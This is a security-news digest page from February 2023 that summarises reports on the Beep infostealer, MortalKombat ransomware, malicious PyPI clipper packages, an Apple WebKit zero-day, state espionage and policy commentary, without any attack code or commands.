Security News > 2023 > February

A new stealthy malware named 'Beep' was discovered last week, featuring many features to evade analysis and detection by security software. Beep is an information stealer malware that uses three separate components: a dropper, an injector, and the payload. The dropper creates a new registry key with an 'AphroniaHaimavati' value that contains a base64 encoded PowerShell script.

Hackers conducting a new financially motivated campaign are using a variant of the Xortist commodity ransomware named 'MortalKombat,' together with the Laplas clipper in cyberattacks. As for MortalKombat, Cisco Talos says the new ransomware is based on the Xorist commodity ransomware family, which utilizes a builder that lets threat actors customize the malware.

In 2015, Chinese military hackers hacked the Office of Personal Management and made off with the highly personal information of about 22 million Americans who had security clearances. We need to demonstrate that it's possible to build systems that can defend themselves against hackers, criminals, and national intelligence agencies; secure Internet-of-Things systems; and systems that can reestablish security after a breach.

Malicious actors have published more than 451 unique Python packages on the official Python Package Index repository in an attempt to infect developer systems with clipper malware. Targeted web browsers include Google Chrome, Microsoft Edge, Brave, and Opera, with the malware modifying browser shortcuts to load the add-on automatically upon launch using the "-load-extension" command line switch.

CISOs are concerned about the rise of ransomware - not only of the proliferation of attacks but also of their sophistication: "The storage and backup environments are now under attack, as the attackers realize that this is the single biggest determining factor to show if the company will pay the ransom," says George Eapen, Group CIO at Petrofac,. Immutable storage is the simplest way to protect backup data.

Apple has released security updates that fix a WebKit zero-day vulnerability that "May have been actively exploited."The bug has been fixed in iOS 16.3.1 and iPadOS 16.3.1, macOS Ventura 13.2.1, Safari 16.3.1, and possibly also in tvOS 16.3.2 and watchOS 9.3.1 - though release notes for the updates for those Internet of Things operating systems have been temporarily witheld.

Microsoft on Monday attributed a China-based cyber espionage actor to a set of attacks targeting diplomatic entities in South America. The threat actor is said to use established hacking tools such as ShadowPad to infiltrate targets and maintain persistent access.

"Swiss Army knife" malware - multi-purpose malware that can perform malicious actions across the cyber-kill chain and evade detection by security controls - is on the rise, according to the results of Picus Security's analysis of over 550,000 real-world malware samples gathered from commercial and open-source threat intelligence services, security vendors and researchers, and malware sandboxes and databases. The average malware leverages 11 different tactics, techniques, and procedures.

Users who visit the password reset link are met with "Technical problems," thereby making it impossible for them to reset their password or log in to their accounts. Eurostar password reset bug is locking passengers out.

In a refresh, CISA and NIST should acknowledge the reality that an organization is made up of component parts including the network, the cloud, mobile and countless endpoints. Too few companies and organizations are seeing what CISA produces and following its valuable advice.